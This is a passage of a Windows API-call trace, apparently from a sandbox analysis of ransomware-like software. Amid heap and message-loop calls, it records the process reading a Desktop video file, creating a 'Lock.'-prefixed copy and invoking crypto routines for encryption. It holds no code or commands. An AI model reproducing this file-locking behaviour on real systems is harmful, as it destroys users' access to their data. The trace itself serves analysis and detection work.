lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0209.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0209.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0209.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0209.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0209.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0209.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0209.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0209.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0209.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0209.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0209.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0209.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0209.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0209.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0209.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0209.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0209.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0209.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0209.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0209.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0209.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0209.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0209.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0209.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0209.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0209.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0209.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0209.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0209.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0209.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0209.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0209.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0209.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bc0 [0209.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c50 [0209.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0209.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c38 [0209.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bd8 [0209.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0209.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0209.593] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0209.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0209.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0209.593] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0209.593] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0209.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0209.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0209.593] CryptDestroyHash (hHash=0xa87250) returned 1 [0209.594] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.594] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.594] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0209.594] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0209.594] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.595] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/VstT.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\vstt.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0209.596] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.596] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0209.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0209.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0209.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0209.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0209.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0209.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0209.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0209.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0209.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0209.597] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0209.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0209.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0209.597] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0209.597] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0209.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0209.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0209.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0209.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0209.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0209.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0209.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0209.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0209.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0209.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0209.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0209.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0209.598] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0209.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0209.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0209.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0209.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f14010 [0209.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0209.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0209.598] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.VstT.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.vstt.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0209.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0209.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0209.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0209.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0209.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0209.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0209.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0209.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0209.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0209.600] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0209.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0209.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0209.600] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0209.601] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0209.601] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0209.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0209.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0209.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0209.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0209.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0209.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0209.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0209.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0209.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0209.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0209.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0209.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0209.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0209.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0209.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe54020 [0209.606] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0209.606] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x6d22, lpOverlapped=0x0) returned 1 [0209.609] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0209.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0209.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0209.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0209.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0209.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d22) returned 0x2f24018 [0209.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe54020 | out: hHeap=0x970000) returned 1 [0209.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0209.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0209.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0209.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0209.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0209.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0209.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0209.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0209.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d22) returned 0x2f2ad48 [0209.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0209.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0209.664] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0209.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0209.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0209.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0209.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0209.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d22) returned 0x2f24018 [0209.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0209.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0209.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0209.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0209.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0209.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0209.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0209.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0209.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0209.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0209.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0209.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0209.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0209.666] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0209.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0209.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0209.666] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0209.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0209.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0209.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0209.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0209.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0209.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0209.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0209.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0209.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d22) returned 0x2f24018 [0209.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0209.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0209.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0209.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0209.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0209.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0209.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0209.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0209.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0209.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0209.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0209.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0209.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0209.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0209.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0209.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0209.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0209.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0209.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0209.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d22) returned 0x2f31a78 [0209.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0209.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0209.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0209.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0209.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0209.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0209.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0209.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0209.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0209.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0209.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0209.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0209.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0209.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0209.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0209.669] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0209.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0209.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0209.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0209.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0209.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0209.670] 